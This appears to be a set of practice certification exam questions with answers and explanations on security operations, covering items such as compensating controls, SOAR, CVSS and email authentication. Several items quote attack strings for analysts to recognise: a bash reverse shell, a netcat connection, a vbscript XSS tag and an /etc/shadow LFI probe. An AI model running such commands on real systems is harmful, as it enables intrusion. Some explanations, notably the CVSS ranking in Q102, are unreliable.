Additionally, regular code reviews and vulnerability assessments can help identify and address such issues.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
75
Q

An incident response team is working with law enforcement to investigate an active web server compromise. The decision has been made to keep the server running and to implement compensating controls for a period of time. The web service must be accessible from the internet via the reverse proxy and must connect to a database server. Which of the following compensating controls will help contain the adversary while meeting the other requirements? (Choose two).

A. Drop the tables on the database server to prevent data exfiltration.
B. Deploy EDR on the web server and the database server to reduce the adversary’s capabilities.
C. Stop the httpd service on the web server so that the adversary can not use web exploits.
D. Use microsegmentation to restrict connectivity to/from the web and database servers.
E. Comment out the HTTP account in the /etc/passwd file of the web server.
F. Move the database from the database server to the web server.

A

Correct Answer: B, D

Both Options B (EDR deployment) and D (microsegmentation) contain the adversary while maintaining the necessary functionality. These controls strike a balance between security and operational requirements.

Drop the tables on the database server to prevent data exfiltration (Option A): While this action would prevent data exfiltration, it could disrupt legitimate operations and potentially cause data loss. It’s not a recommended compensating control.

Deploy EDR (Endpoint Detection and Response) on the web server and the database server (Option B): EDR solutions monitor and respond to suspicious activities on endpoints. Deploying EDR can enhance threat detection and reduce the adversary’s capabilities. This is a good choice.

Stop the httpd service on the web server (Option C): Disabling the web server would indeed prevent the adversary from using web exploits. However, it would also render the web service inaccessible, which conflicts with the requirement to keep it running.

Use microsegmentation to restrict connectivity (Option D): Microsegmentation involves dividing the network into smaller segments and applying access controls. By restricting communication between the web and database servers, you can limit the adversary’s lateral movement. This is another effective control.

Comment out the HTTP account in the /etc/passwd file of the web server (Option E): Modifying the /etc/passwd file is not a recommended compensating control. It could lead to unintended consequences and may not effectively contain the adversary.

Move the database from the database server to the web server (Option F): Consolidating the database onto the web server is not advisable. It violates the principle of separation of concerns and could expose sensitive data to the internet.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
76
Q

An employee is suspected of misusing a company-issued laptop. The employee has been suspended pending an investigation by human resources. Which of the following is the best step to preserve evidence?

A. Disable the user’s network account and access to web resources.
B. Make a copy of the files as a backup on the server.
C. Place a legal hold on the device and the user’s network share.
D. Make a forensic image of the device and create a SHA-1 hash.

A

Correct Answer: D

This approach ensures that a complete and exact copy of all the data on the device is made, which is essential for a forensic investigation. The SHA-1 hash is used to verify the integrity of the data, ensuring that the forensic image is an exact, unaltered copy of the original data. This is critical for legal and investigative purposes, as it ensures the admissibility of the evidence in any potential legal proceedings.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
77
Q

A cybersecurity analyst is reviewing SIEM logs and observes consistent requests originating from an internal host to a blocklisted external server. Which of the following best describes the activity that is taking place?

A. Data exfiltration
B. Rogue device
C. Scanning
D. Beaconing

A

Correct Answer: D

Based on the information provided, the activity you’re observing is likely beaconing. Beaconing refers to regular, periodic communication between a compromised internal host and an external server. It’s often associated with malware or command-and-control (C2) communication. In contrast, scanning typically involves probing external hosts to identify vulnerabilities or services.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
78
Q

A managed security service provider is having difficulty retaining talent due to an increasing workload caused by a client doubling the number of devices connected to the network. Which of the following would best aid in decreasing the workload without increasing staff?

A. SIEM
B. XDR
C. SOAR
D. EDR

A

Correct Answer: C

Given the situation, SOAR would be the most effective choice for decreasing the workload without increasing staff. Let me explain why:

SIEM (Security Information and Event Management): SIEM systems collect and analyze security event data from various sources, but they don’t directly reduce workload. They are more focused on monitoring and alerting.

XDR (Extended Detection and Response): XDR solutions provide advanced threat detection and response capabilities, but they don’t inherently reduce workload. They might actually increase workload due to additional alerts and investigations.

SOAR (Security Orchestration, Automation, and Response): SOAR platforms automate repetitive security tasks, orchestrate incident response processes, and integrate with various security tools. By automating incident response workflows, SOAR can significantly reduce manual effort, streamline processes, and improve efficiency. It allows security analysts to focus on more complex tasks while routine actions are handled automatically.

EDR (Endpoint Detection and Response): EDR tools focus on detecting and responding to threats at the endpoint level. While they are essential for security, they don’t directly address workload reduction.
In summary, SOAR provides the best solution for managing increased workload efficiently by automating repetitive tasks and orchestrating incident response processes.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
79
Q

An analyst receives threat intelligence regarding potential attacks from an actor with seemingly unlimited time and resources. Which of the following best describes the threat actor attributed to the malicious activity?

A. Insider threat
B. Ransomware group
C. Nation-state
D. Organized crime

A

Correct Answer: C

Given the context of seemingly unlimited time and resources, the threat actor most likely falls into the “Nation-state” category.

Nation-state actors are typically well-funded, highly skilled, and have extensive resources at their disposal. They engage in cyber espionage, political influence, and other strategic activities.

While other threat actors like ransomware groups and organized crime may also pose significant risks, the combination of unlimited resources and time aligns more closely with nation-state capabilities.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
80
Q

While reviewing web server logs, a security analyst found the following line:

< IMG SRC=’vbscript:msgbox(“test”)’ >

Which of the following malicious activities was attempted?

A. Command injection
B. XML injection
C. Server-side request forgery
D. Cross-site scripting

A

Correct Answer: D

The malicious activity attempted in this case is Cross-site scripting (XSS).

The provided line contains a script embedded within an image tag (<img></img>), which executes VBScript code (msgbox(“test”)).

This code would display a message box with the text “test” when the image is loaded by a victim’s browser.

XSS attacks allow an attacker to inject malicious scripts into web pages viewed by other users, potentially compromising their data or executing unauthorized actions.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
81
Q

A systems analyst is limiting user access to system configuration keys and values in a Windows environment. Which of the following describes where the analyst can find these configuration items?

A. config.ini
B. ntds.dit
C. Master boot record
D. Registry

A

Correct Answer: D

The correct answer is D. Registry. The Windows Registry contains configuration keys and values that control various aspects of the operating system and installed applications. It’s a centralized database where system settings, user preferences, and hardware configurations are stored.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
82
Q

A security analyst at a company called ACME Commercial notices there is outbound traffic to a host IP that resolves to https://office365password.acme.co. The site’s standard VPN logon page is www.acme.com/logon. Which of the following is most likely true?

A. This is a normal password change URL.
B. The security operations center is performing a routine password audit.
C. A new VPN gateway has been deployed.
D. A social engineering attack is underway.

A

Correct Answer: D

The URL “https://office365password.acme.co” does not match the standard VPN logon page “www.acme.com/logon,”

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
83
Q

A security analyst is performing vulnerability scans on the network. The analyst installs a scanner appliance, configures the subnets to scan, and begins the scan of the network. Which of the following would be missing from a scan performed with this configuration?

A. Operating system version
B. Registry key values
C. Open ports
D. IP address

A

Correct Answer: B

A vulnerability scan performed by a scanner appliance on a network typically focuses on identifying vulnerabilities related to open ports, services, and known software vulnerabilities. It may also gather information about the operating system versions running on target hosts. However, registry key values are specific to Windows operating systems and are not typically part of a standard vulnerability scan. Registry information is typically not directly exposed or accessible via network scanning, so it’s not a common target for such scans.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
84
Q

A security analyst discovers an LFI vulnerability that can be exploited to extract credentials from the underlying host. Which of the following patterns can the security analyst use to search the web server logs for evidence of exploitation of that particular vulnerability?

A. /etc/shadow
B. curl localhost
C. ; printenv
D. cat /proc/self/

A

Correct Answer: A

Local File Inclusion (LFI) is a web security vulnerability that occurs when an attacker tricks a web application into including files from the local server.

If an attacker successfully exploits an LFI vulnerability to extract credentials from the underlying host, one way they might attempt to access sensitive files is by trying to access the “/etc/shadow” file. The “/etc/shadow” file on Unix-based systems like Linux contains the hashed passwords of users.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
85
Q

A company receives a penetration test report summary from a third party. The report summary indicates a proxy has some patches that need to be applied. The proxy is sitting in a rack and is not being used, as the company has replaced it with a new one. The CVE score of the vulnerability on the proxy is a 9.8. Which of the following best practices should the company follow with this proxy?

A. Leave the proxy as is.
B. Decomission the proxy.
C. Migrate the proxy to the cloud.
D. Patch the proxy.

A

Correct Answer: B

Proxy Not in Use: Since the proxy is sitting in a rack and is not being used, it’s not actively serving any purpose. Keeping unused and unpatched systems in the network can pose security risks.

High CVE Score (9.8): The vulnerability on the proxy has a high Common Vulnerability Scoring System (CVSS) score of 9.8. Such a high score indicates a critical vulnerability with the potential for severe impact. Leaving it unpatched would expose the company to significant risk.

Security Best Practices: Security best practices recommend promptly addressing vulnerabilities, especially those with high scores. Decommissioning the proxy ensures that it’s removed from the network, eliminating the risk associated with the unpatched vulnerability.

In summary, decommissioning the unused proxy is the most prudent course of action to mitigate security risks.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
86
Q

A company is in the process of implementing a vulnerability management program. Which of the following scanning methods should be implemented to minimize the risk of OT/ICS devices malfunctioning due to the vulnerability identification process?

A. Non-credentialed scanning
B. Passive scanning
C. Agent-based scanning
D. Credentialed scanning

A

Correct Answer: B

Passive scanning is a method of vulnerability identification that does not send any packets or probes to the target devices, but rather observes and analyzes the network traffic passively. Passive scanning can minimize the risk of Operational Technology (OT)/Industrial Control Systems (ICS) devices malfunctioning due to the vulnerability identification process, as it does not interfere with the normal operation of the devices or cause any network disruption. Passive scanning can also detect vulnerabilities that active scanning may miss, such as misconfigured devices, rogue devices or unauthorized traffic.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
87
Q

An analyst is examining events in multiple systems but is having difficulty correlating data points. Which of the following is most likely the issue with the system?

A. Access rights
B. Network segmentation
C. Time synchronization
D. Invalid playbook

A

Correct Answer: C

Given the scenario, the most likely issue with the system is C. Time synchronization.

When events are logged across multiple systems, accurate timestamps are crucial for correlation.

If the system clocks are not synchronized, it can lead to discrepancies in event timelines, making it difficult to correlate data points effectively.

Ensuring consistent time synchronization across systems is essential for accurate analysis and incident response.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
88
Q

An analyst recommends that an EDR agent collect the source IP address, make a connection to the firewall, and create a policy to block the malicious source IP address across the entire network automatically. Which of the following is the best option to help the analyst implement this recommendation?

A. SOAR
B. SIEM
C. SLA
D. IoC

A

Correct Answer: A

SOAR (Security Orchestration, Automation, and Response): SOAR platforms are designed to streamline security operations by integrating various security tools, automating workflows, and orchestrating incident response processes. They allow analysts to create playbooks that automate repetitive tasks, including blocking malicious IP addresses. By collecting data from EDR agents, SOAR platforms can trigger automated actions, such as creating firewall rules to block the identified threat across the network.

SIEM (Security Information and Event Management): While SIEM systems are essential for collecting and analyzing security logs, they are primarily focused on monitoring and detection. SIEMs provide visibility into security events but do not directly automate actions like blocking IP addresses.

SLA (Service Level Agreement): SLAs define the expected level of service between parties (e.g., an organization and a vendor). They are not directly related to implementing security recommendations or automating threat response.

**IoC (Indicator of Compromise): **IoCs are specific artifacts (such as IP addresses, domains, hashes) associated with security threats. While IoCs are crucial for threat intelligence, they do not provide the automation capabilities needed to block malicious IP addresses.

Remember that SOAR platforms combine automation, orchestration, and incident response, making them the most suitable choice for implementing the analyst’s recommendation.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
89
Q

Which of the following describes the best reason for conducting a root cause analysis?

A. The root cause analysis ensures that proper timelines were documented.
B. The root cause analysis allows the incident to be properly documented for reporting.
C. The root cause analysis develops recommendations to improve the process.
D. The root cause analysis identifies the contributing items that facilitated the event.

A

Correct Answer: D

The root cause analysis identifies the contributing items that facilitated the event. **It helps uncover the underlying factors that led to an incident, allowing organizations to address vulnerabilities and prevent similar events in the future. **

By understanding the root cause, effective corrective actions can be taken to improve processes and prevent recurrence.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
90
Q

An end-of-life date was announced for a widely used OS. A business-critical function is performed by some machinery that is controlled by a PC, which is utilizing the OS that is approaching the end-of-life date. Which of the following best describes a security analyst’s concern?

A. Any discovered vulnerabilities will not be remediated.
B. An outage of machinery would cost the organization money.
C. Support will not be available for the critical machinery.
D. There are no compensating controls in place for the OS.

A

Correct Answer: A

As an operating system reaches its end-of-life date, the vendor typically stops providing security updates and patches for known vulnerabilities.

This leaves systems running on the outdated OS exposed to potential security risks. Without the ability to receive patches, any vulnerabilities discovered in the OS after the end-of-life date will remain unaddressed, increasing the risk of exploitation by malicious actors. This concern highlights the importance of migrating critical systems to supported and up-to-date platforms to mitigate security risks.

While options B, C, and D may also be concerns for the organization, the primary focus of a security analyst is typically on mitigating security risks, making option A the best choice.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
91
Q

A security analyst identified the following suspicious entry on the host-based IDS logs:

bash -i >& /dev/tcp/10.1.2.3/8080 0>&1

Which of the following shell scripts should the analyst use to most accurately confirm if the activity is ongoing?

A. #!/bin/bash
nc 10.1.2.3 8080 -vv >dev/null && echo “Malicious activity” || echo “OK”
B. #!/bin/bash
ps -fea | grep 8080 >dev/null && echo “Malicious activity” || echo “OK”
C. #!/bin/bash
ls /opt/tcp/10.1.2.3/8080 >dev/null && echo “Malicious activity” || echo “OK”
D. #!/bin/bash
netstat -antp | grep 8080 >dev/null && echo “Malicious activity” || echo “OK”

A

Correct Answer: D

The suspicious entry bash -i >& /dev/tcp/10.1.2.3/8080 0>&1 appears to be an attempt to establish a reverse shell connection to the IP address 10.1.2.3 on port 8080.

Option A:
* This script uses nc (netcat) to connect to 10.1.2.3 on port 8080.
* If the connection is successful, it echoes “Malicious activity”; otherwise, it echoes “OK.”
* However, this script doesn’t directly verify the suspicious command.
* Not the best choice for confirming ongoing activity related to the suspicious entry.

Option B:
* This script uses ps -fea to list all processes and then pipes the output to grep 8080.
* If any process with port 8080 is found, it echoes “Malicious activity”; otherwise, it echoes “OK.”
* While it checks for processes, it doesn’t specifically validate the suspicious command.
* Not the most accurate choice for confirming ongoing activity related to the suspicious entry.

Option C:
* This script attempts to list the contents of a non-existent directory (/opt/tcp/10.1.2.3/8080).
* It will likely fail and always echo “OK.”
* Definitely not the right choice for confirming the suspicious activity.

Option D:
* This script uses netstat -antp to display active network connections.
* It then pipes the output to grep 8080 to check for any connections on port 8080.
* If a connection exists, it echoes “Malicious activity”; otherwise, it echoes “OK.”
* Best choice among the given options for confirming ongoing activity related to the suspicious entry.

Therefore, the security analyst should use Option D to accurately confirm whether the suspicious activity is ongoing. This script checks for active connections on port 8080, which aligns with the suspicious command.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
92
Q

Which of the following concepts is using an API to insert bulk access requests from a file into an identity management system an example of?

A. Command and control
B. Data enrichment
C. Automation
D. Single sign-on

A

Correct Answer: C

Using an API to insert bulk access requests from a file into an identity management system is an example of automation.

This process streamlines the creation of multiple access requests simultaneously, improving efficiency and accuracy.

Unlike single sign-on (D), which focuses on user authentication, automation (C) handles repetitive tasks programmatically.

Data enrichment (B) typically involves enhancing existing data with additional information, but it’s not directly related to bulk access requests.

And command and control (A) refers to a cyber threat tactic, not a system functionality.

So, the correct answer is C. Automation.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
93
Q

A SOC analyst recommends adding a layer of defense for all endpoints that will better protect against external threats regardless of the device’s operating system. Which of the following best meets this requirement?

A. SIEM
B. CASB
C. SOAR
D. EDR

A

Correct Answer: D

The best choice for adding a layer of defense to endpoints against external threats, regardless of the operating system, is Endpoint Detection and Response (EDR).

EDR solutions provide real-time monitoring, threat detection, and response capabilities specifically for endpoints. They help identify suspicious activities, detect malware, and respond to incidents promptly. Unlike other options:

SIEM (Security Information and Event Management) aggregates and analyzes logs from various sources, including endpoints, but it doesn’t directly protect endpoints.

CASB (Cloud Access Security Broker) focuses on securing cloud applications and data, not necessarily endpoints.

SOAR (Security Orchestration, Automation, and Response) streamlines incident response processes but doesn’t directly add a protective layer to endpoints.
Remember, EDR solutions are designed to monitor and safeguard endpoints, making them a suitable choice for this requirement.

94
Q

A company is concerned with finding sensitive file storage locations that are open to the public. The current internal cloud network is flat. Which of the following is the best solution to secure the network?

A. Implement segmentation with ACLs.
B. Configure logging and monitoring to the SIEM.
C. Deploy MFA to cloud storage locations.
D. Roll out an IDS.

A

Correct Answer: A

Segmentation with ACLs (Access Control Lists):

  • Segmentation involves dividing the flat network into smaller, isolated segments. Each segment can have its own security policies and access controls.
  • ACLs are rules that determine which traffic is allowed or denied between segments. By configuring ACLs, you can restrict communication between sensitive file storage locations and the public network.
  • This approach minimizes lateral movement within the network, reducing the attack surface and preventing unauthorized access.
  • ACLs can be applied at the network level (e.g., using firewalls) or at the host level (e.g., using security groups in cloud environments).

Other Options:
Logging and monitoring to the SIEM (Option B): While important for visibility, this alone won’t prevent unauthorized access. It helps detect incidents but doesn’t proactively secure the network.

Deploying MFA to cloud storage locations (Option C): MFA enhances authentication but doesn’t directly address network segmentation.

Rolling out an IDS (Option D): An Intrusion Detection System detects suspicious activity but doesn’t segment the network.

95
Q

A security analyst is reviewing the findings of the latest vulnerability report for a company’s web application. The web application accepts files for a Bash script to be processed if the files match a given hash. The analyst is able to submit files to the system due to a hash collision. Which of the following should the analyst suggest to mitigate the vulnerability with the fewest changes to the current script and infrastructure?

A. Deploy a WAF to the front of the application.
B. Replace the current MD5 with SHA-256.
C. Deploy an antivirus application on the hosting system.
D. Replace the MD5 with digital signatures.

A

Correct Answer: B

The security analyst should suggest Option B: Replace the current MD5 with SHA-256. This change provides stronger hash integrity without major infrastructure alterations. It’s a practical solution that mitigates the vulnerability effectively.

Deploy a WAF (Web Application Firewall) to the front of the application:
* While a WAF can help protect against certain attacks, it won’t directly address the hash collision vulnerability.
* This option involves additional infrastructure changes.

Replace the current MD5 with SHA-256:
* This is a good choice. MD5 is susceptible to hash collisions, which is how the analyst was able to submit files.
* SHA-256 is a stronger cryptographic hash function and less prone to collisions.
* It requires minimal changes to the existing script and infrastructure.

Deploy an antivirus application on the hosting system:
* Antivirus software is not directly related to hash collisions.
* It won’t address the root cause of the vulnerability.

Replace the MD5 with digital signatures:
* While digital signatures enhance security, they involve more significant changes.
* Implementing digital signatures would require modifications to the script and infrastructure.

96
Q

A security analyst needs to mitigate a known, exploited vulnerability related to an attack vector that embeds software through the USB interface. Which of the following should the analyst do first?

A. Conduct security awareness training on the risks of using unknown and unencrypted USBs.
B. Write a removable media policy that explains that USBs cannot be connected to a company asset.
C. Check configurations to determine whether USB ports are enabled on company assets.
D. Review logs to see whether this exploitable vulnerability has already impacted the company.

A

Correct Answer: C

This is the most immediate action to take. Disabling or securing USB ports on company assets will prevent the attacker from further exploiting the vulnerability through this attack vector. It’s a quick and effective way to mitigate ongoing attacks.

97
Q

A systems administrator receives reports of an internet-accessible Linux server that is running very sluggishly. The administrator examines the server, sees a high amount of memory utilization, and suspects a DoS attack related to half-open TCP sessions consuming memory. Which of the following tools would best help to prove whether this server was experiencing this behavior?

A. Nmap
B. TCPDump
C. SIEM
D. EDR

A

Correct Answer: B

The behavior described aligns with a SYN flood attack, also known as a half-open attack.

A SYN flood attack aims to make a server unavailable by overwhelming it with half-open connections. Here’s how it works:

The attacker sends a high volume of SYN packets to the targeted server, often with spoofed IP addresses.
The server responds to each connection request and leaves an open port ready to receive the response.

While waiting for the final ACK packet (which never arrives), the server maintains these half-open connections.
Eventually, all available ports are utilized, causing the server to become sluggish or unresponsive

Given this context, the best tool to investigate this behavior would be TCPDump.

It allows you to capture and analyze network traffic, including SYN packets. By examining the captured data, you can identify patterns consistent with a SYN flood attack.

Other tools like Nmap, SIEM, and EDR are valuable for different purposes but may not directly prove the specific attack type in this scenario.

98
Q

Which of the following is the most important factor to ensure accurate incident response reporting?

A. A well-defined timeline of the events
B. A guideline for regulatory reporting
C. Logs from the impacted system
D. A well-developed executive summary

A

Correct Answer: A

A well-defined timeline of the events is crucial for accurate incident response reporting. It provides context, helps identify the attack’s progression, and aids in root cause analysis.

While other factors (such as regulatory guidelines, system logs, and executive summaries) are important, the timeline is foundational.

99
Q

A security analyst is trying to detect connections to a suspicious IP address by collecting the packet captures from the gateway. Which of the following commands should the security analyst consider running?

A. grep [IP address] packets.pcap
B. cat packets.pcap | grep [IP Address]
C. tcpdump -n -r packets.pcap host [IP address]
D. strings packets.pcap | grep [IP Address]

A

Correct Answer: C

The most suitable command for analyzing packet captures to detect connections to a specific IP address is option C:

tcpdump-n-rpackets.pcaphost[IPaddress]

tcpdump: This command is commonly used for packet analysis and network traffic inspection.
-n: This flag ensures that IP addresses are displayed numerically (instead of resolving hostnames).
-r packets.pcap: Specifies the input file (the packet capture file named “packets.pcap”).
host [IP address]: Filters packets where the source or destination IP address matches the specified IP address.

By running this command, the security analyst can focus on relevant network traffic related to the suspicious IP address. Remember to replace “[IP address]” with the actual IP address you’re investigating.

100
Q

A security analyst reviews the latest vulnerability scans and observes there are vulnerabilities with similar CVSSv3 scores but different base score metrics. Which of the following attack vectors should the analyst remediate first?

A. CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
B. CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
C. CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
D. CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

A

Correct Answer: C

Given that all options have the same impact (C:H/I:H/A:H), the attack vector becomes crucial.

The analyst should prioritize vulnerabilities with the easiest attack vectors to exploit.

(N)etwork > (A)djacent > (L)ocal > (P)hysical

101
Q

A security analyst must review a suspicious email to determine its legitimacy. Which of the following should be performed? (Choose two.)

A. Evaluate scoring fields, such as Spam Confidence Level and Bulk Complaint Level
B. Review the headers from the forwarded email
C. Examine the recipient address field
D. Review the Content-Type header
E. Evaluate the HELO or EHLO string of the connecting email server
F. Examine the SPF, DKIM, and DMARC fields from the original email

A

Correct Answer: A, F

  • Evaluate scoring fields (SCL and Bulk Complaint Level):
    Correct: Checking the Spam Confidence Level (SCL) and Bulk Complaint Level is a valid step. These scores help assess the likelihood that an email is spam or malicious. A high SCL or numerous bulk complaints may indicate suspicious content.
  • Review email headers:
    Not directly relevant: Considering that forwarded emails replace headers with the forwarder’s info, this step becomes less effective. The original headers are lost.
    Look for anomalies, such as unusual IP addresses, domains, or inconsistencies in the Received headers.
  • Examine the recipient address field:
    Not directly relevant: While it’s generally good practice to verify recipient addresses, this step alone may not determine the email’s legitimacy. It’s essential to consider other factors as well.
  • Review the Content-Type header:
    Not directly relevant: The Content-Type header specifies the format of the email content (e.g., text, HTML). While it’s useful for rendering the email correctly, it doesn’t directly assess legitimacy.
  • Evaluate the HELO or EHLO string of the connecting email server:
    Not directly relevant: The HELO/EHLO string is part of the SMTP handshake during email communication. While it can provide clues about the server, it’s not a primary step for assessing email legitimacy.
  • Examine the SPF, DKIM, and DMARC fields from the original email:
    Correct: Checking SPF (Sender Policy Framework), DKIM (DomainKeys Identified Mail), and DMARC (Domain-based Message Authentication, Reporting, and Conformance) records helps verify the email’s legitimacy. These fields prevent email spoofing and enhance security.
102
Q

A vulnerability analyst received a list of system vulnerabilities and needs to evaluate the relevant impact of the exploits on the business. Given the constraints of the current sprint, only three can be remediated. Which of the following represents the least impactful risk, given the CVSS3.1 base scores?

A. AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:L - Base Score 6.0
B. AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:L - Base Score 7.2
C. AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H - Base Score 6.4
D. AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L - Base Score 6.5

A

Correct Answer: D

In the context of the Common Vulnerability Scoring System (CVSS3.1), the CIA triad represents the impact of a vulnerability on three key aspects: Confidentiality, Integrity, and Availability.

  • Option A: (C:H/I:H/A:L) = (1-(1-0.56)(1-0.56)(1-0.24))=0.64
  • Option B: (C:H/I:H/A:L) = (1-(1-0.56)(1-0.56)(1-0.24))=0.64
  • Option C: (C:H/I:H/A:H) = (1-(1-0.56)(1-0.56)(1-0.56))=0.68
  • Option D: (C:L/I:L/A:L) = (1-(1-0.24)(1-0.24)(1-0.24))=0.501
103
Q

A recent vulnerability scan resulted in an abnormally large number of critical and high findings that require patching. The SLA requires that the findings be remediated within a specific amount of time. Which of the following is the best approach to ensure all vulnerabilities are patched in accordance with the SLA?

A. Integrate an IT service delivery ticketing system to track remediation and closure
B. Create a compensating control item until the system can be fully patched
C. Accept the risk and decommission current assets as end of life
D. Request an exception and manually patch each system

A

Correct Answer: A

Given the situation, the best approach to ensure all vulnerabilities are patched in accordance with the Service Level Agreement (SLA) is to integrate an IT service delivery ticketing system to track remediation and closure (Option A).

  • Integrating an IT service delivery ticketing system allows for efficient tracking and management of vulnerability remediation efforts. It provides a structured process for handling vulnerabilities, assigning tasks, and monitoring progress. By using a ticketing system, you can prioritize tasks, set deadlines, and ensure accountability.
  • Creating compensating control items (Option B) might be a temporary solution, but it doesn’t address the root cause of the vulnerabilities. It’s essential to focus on actual patching rather than workarounds.
  • Accepting the risk and decommissioning assets (Option C) is not advisable unless the vulnerabilities pose an unacceptable risk to the organization. Decommissioning assets should be a last resort after considering other mitigation options.
  • Requesting an exception and manually patching each system (Option D) can be time-consuming and error-prone. It’s better to automate the process using a ticketing system to streamline remediation efforts.
104
Q

An organization was compromised, and the usernames and passwords of all employees were leaked online. Which of the following best describes the remediation that could reduce the impact of this situation?

A. Multifactor authentication
B. Password changes
C. System hardening
D. Password encryption

A

Correct Answer: A

In this scenario, multifactor authentication (MFA) would be the most effective remediation measure to reduce the impact of the compromised usernames and passwords. MFA adds an extra layer of security by requiring users to provide multiple forms of identification (such as a password and a one-time code sent to their phone) before granting access. This significantly reduces the risk of unauthorized access even if passwords are leaked.

  • Password changes: While changing passwords is important, it won’t prevent unauthorized access if the leaked passwords are still in use elsewhere (e.g., reused on other sites).
  • System hardening: System hardening involves securing servers and network devices by applying security best practices. While important, it doesn’t directly address the compromised credentials.
  • Password encryption: Password encryption is essential for protecting stored passwords, but it doesn’t prevent their leakage in the first place.
105
Q

Which of the following would help an analyst to quickly find out whether the IP address in a SIEM alert is a known-malicious IP address?

A. Join an information sharing and analysis center specific to the company’s industry
B. Upload threat intelligence to the IPS in STIX’TAXII format
C. Add data enrichment for IPs in the ingestion pipeline
D. Review threat feeds after viewing the SIEM alert

A

Correct Answer: C

Data Enrichment: Data enrichment is the process of adding additional context and information to the data in your SIEM. By enriching the SIEM data with threat intelligence feeds that contain information about known-malicious IP addresses, you can quickly identify whether an IP address in an alert is associated with known threats. This process allows for real-time analysis and correlation of SIEM alerts with known threat indicators.

106
Q

A security administrator needs to import PII data records from the production environment to the test environment for testing purposes. Which of the following would best protect data confidentiality?

A. Data masking
B. Hashing
C. Watermarking
D. Encoding

A

Correct Answer: A

  • Data Masking: This technique involves replacing sensitive data with fictional or scrambled values. It ensures that the original data remains confidential while allowing testing and development to proceed with realistic data. For example, you could replace actual names with pseudonyms or Social Security numbers with random digits1.
  • Hashing: Hashing is primarily used for data integrity and verification, not confidentiality. It converts data into fixed-length hash values (such as MD5 or SHA-256), making it challenging to reverse-engineer the original data. However, it doesn’t protect confidentiality because the hash can’t be reversed to reveal the original content.
  • Watermarking: Watermarking is used to embed information (such as copyright notices or ownership details) within files or documents. It doesn’t directly protect data confidentiality.
  • Encoding: Encoding (e.g., Base64 encoding) is a reversible transformation that doesn’t provide strong confidentiality. It’s commonly used for data representation but doesn’t hide the original content from those who understand the encoding scheme.
107
Q

A company is deploying new vulnerability scanning software to assess its systems. The current network is highly segmented, and the networking team wants to minimize the number of unique firewall rules. Which of the following scanning techniques would be most efficient to achieve the objective?

A. Deploy agents on all systems to perform the scans
B. Deploy a central scanner and perform non-credentialed scans
C. Deploy a cloud-based scanner and perform a network scan
D. Deploy a scanner sensor on every segment and perform credentialed scans

A

Correct Answer: B

To minimize the number of unique firewall rules while efficiently assessing systems, Option B—deploying a central scanner and performing non-credentialed scans—is the most suitable choice.
- Central Scanner: Deploying a central scanner allows you to manage scanning from a single location. This reduces the need for multiple firewall rules across segments.
- Non-Credentialed Scans: Non-credentialed scans assess vulnerabilities from an external perspective without requiring credentials. They focus on identifying open ports, services, and potential vulnerabilities. Since they don’t rely on specific system access, they can be more efficient in a segmented network.

Option A (Deploy Agents on All Systems):
- Deploying agents on all systems would require installing and managing software agents across the entire network. This approach can be resource-intensive, especially in a highly segmented network.
- It would also increase the attack surface by introducing additional software components.
- Managing agents on all systems can be cumbersome and may not scale well.

Option C (Deploy a Cloud-Based Scanner and Perform Network Scans):
- While cloud-based scanners offer flexibility, they still require network scans. In a highly segmented environment, network scans may not efficiently assess all systems.
- Cloud-based scanners might not have visibility into internal network segments, limiting their effectiveness.

Option D (Deploy a Scanner Sensor on Every Segment and Perform Credentialed Scans):
- Deploying a scanner sensor on every segment is resource-intensive and complex.
- Credentialed scans require access to system credentials, which might not be feasible for all systems.
- Managing multiple scanner sensors across segments can be challenging.

In summary, Option B (Deploy a Central Scanner and Perform Non-Credentialed Scans) strikes a balance between efficiency and security. It minimizes firewall rules while allowing centralized management and efficient scanning.

108
Q

The email system administrator for an organization configured DKIM signing for all email legitimately sent by the organization. Which of the following would most likely indicate an email is malicious if the company’s domain name is used as both the sender and the recipient?

A. The message fails a DMARC check
B. The sending IP address is the hosting provider
C. The signature does not meet corporate standards
D. The sender and reply address are different

A

Correct Answer: A

The most likely indicator of a malicious email in this scenario is option A: The message fails a DMARC check. DMARC (Domain-based Message Authentication, Reporting, and Conformance) is a policy framework that helps prevent email spoofing and phishing. When an email fails DMARC checks, it suggests that the sender’s domain authentication failed, which could indicate a malicious attempt to impersonate the organization. Other options are less directly related to the use of the company’s domain name as both sender and recipient.

109
Q

During an incident involving phishing, a security analyst needs to find the source of the malicious email. Which of the following techniques would provide the analyst with this information?

A. Header analysis
B. Packet capture
C. SSL inspection
D. Reverse engineering

A

Correct Answer: A

To identify the source of a malicious email in a phishing incident, header analysis is the most relevant technique.

Header Analysis:
- When analyzing email headers, security analysts can extract valuable information such as the sender’s IP address, domain, and routing path.
- The Message-ID in the header uniquely identifies an email message and helps trace its origin.
- By examining raw email headers, analysts can determine the true source of the email.

110
Q

An analyst wants to ensure that users only leverage web-based software that has been pre-approved by the organization. Which of the following should be deployed?

A. Blocklisting
B. Allowlisting
C. Graylisting
D. Webhooks

A

Correct Answer: B

